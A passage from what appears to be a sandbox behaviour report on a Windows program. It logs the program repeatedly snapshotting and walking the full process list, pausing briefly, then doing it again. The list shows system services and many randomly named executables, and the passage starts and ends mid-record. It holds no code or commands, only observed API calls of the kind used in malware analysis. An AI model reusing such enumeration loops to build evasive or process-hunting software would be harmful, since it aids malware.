th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0118.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0118.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0118.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0118.388] CloseHandle (hObject=0xc4) returned 1 [0118.388] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0118.394] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.395] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0118.396] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0118.400] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.401] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0118.402] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.403] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0118.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0118.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0118.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0118.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0118.419] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.420] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.420] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0118.422] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.427] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0118.430] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0118.432] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0118.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0118.439] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0118.441] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0118.442] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0118.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0118.445] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0118.447] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0118.448] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0118.450] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0118.451] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0118.453] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0118.454] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0118.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0118.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0118.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0118.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0118.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0118.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0118.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0118.469] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0118.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0118.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0118.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0118.476] CloseHandle (hObject=0xbc) returned 1 [0118.476] Sleep (dwMilliseconds=0x12c) [0118.944] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0118.951] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0118.952] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0118.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0118.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0118.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0118.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0118.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0118.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0118.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.963] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.964] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0118.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.967] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0118.968] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0118.970] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0118.971] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.972] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.973] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0118.974] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 